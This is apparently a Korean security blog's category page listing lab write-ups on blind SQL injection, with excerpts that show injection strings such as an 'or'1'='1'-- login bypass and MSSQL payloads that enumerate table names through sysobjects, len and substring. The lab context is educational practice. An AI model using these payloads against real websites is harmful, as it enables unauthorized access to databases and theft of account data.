| 일 | 월 | 화 | 수 | 목 | 금 | 토 |
|---|---|---|---|---|---|---|
| 1 | ||||||
| 2 | 3 | 4 | 5 | 6 | 7 | 8 |
| 9 | 10 | 11 | 12 | 13 | 14 | 15 |
| 16 | 17 | 18 | 19 | 20 | 21 | 22 |
| 23 | 24 | 25 | 26 | 27 | 28 | 29 |
| 30 |
- GRE
- Linux
- HSRP
- docker
- UTM
- VPN
- Database Scheme
- Web Authentication
- XSS
- Blind SQL Injection
- Websec
- sql injection
- 보안 솔루션
- wireshark
- web server
- VPC
- Mass SQL Injection
- stored procedure
- Vlan
- SQL
- NETSEC
- Router Firewall
- AWS
- WAF
- DHCP
- arp
- csrf
- Web
- IDS
- snmp
- Today
- Total
목록Blind SQL Injection (3)
yuil :: SecOps
[WebSec] Blind SQL Injection Lab 02
aircon 사이트의 관리자 계정 정보와 database 이름을 찾으세요(db 이름은 database() 함수, 문자열 길이는 length() 함수를 이용)centosmysql -u root -plab admin 경로 예측http://192.168.65.30/aircon/admin/'or'1'='1'--[획득 정보]table : admincolumn : A_id, A_pass주석처리 안됨형 변환 오류 발생 안됨' and database()='testdb 이름이 test가 아닌데 에러가 나지 않음.페이지 탐색참/거짓을 테스트할 수 있는 페이지 찾기http://192.168.65.30/aircon/customer/customer01.php?sub_page=&show=view&board=customer01&..
web hacking practice 사이트는 db 오류 메시지가 차단되어 있다.blind injection 공격 기법을 이용해 table명 두 개와 찾은 table의 column명 두 개를 찾아라.로그인 id창에 입력nuno' and len((select top 1 name from sysobjects where xtype='u' order by name))nuno' and substring((select top 1 name from sysobjects where xtype='u' order by name),1,1)nuno' and (select top 1 name from sysobjects where xtype='u' order by name)='board'--nuno' and substring((..
